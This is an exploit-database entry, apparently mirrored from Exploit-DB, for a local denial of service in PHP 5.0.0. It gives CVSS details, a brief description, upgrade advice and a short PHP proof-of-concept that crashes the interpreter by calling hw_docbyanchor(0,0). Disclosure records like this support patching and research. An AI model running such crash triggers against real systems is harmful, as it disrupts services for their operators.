header-logo
Suggest Exploit
vendor:
PHP
by:
Yakir Wizman
7,5
CVSS
HIGH
Local Denial of Service
400
CWE
Product Name: PHP
Affected Version From: 5.0.0
Affected Version To: 5.0.0
Patch Exists: YES
Related CWE: N/A
CPE: a:php:php:5.0.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Server 2012 R2 64bit
2016

PHP 5.0.0 hw_docbyanchor() Local Denial of Service

This exploit is for PHP 5.0.0 and it causes a Local Denial of Service. It requires the domxml extension to be loaded. The hw_docbyanchor() function is called with two parameters set to 0, which causes the Denial of Service.

Mitigation:

Upgrade to a version of PHP that is not vulnerable to this exploit.
Source

Exploit-DB raw data:

                        <?php
#############################################################################
## PHP 5.0.0 hw_docbyanchor() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("domxml")) die("You need domxml extension loaded!");

hw_docbyanchor(0,0);
?>

Navigation

Suggest Exploit

Services By CQR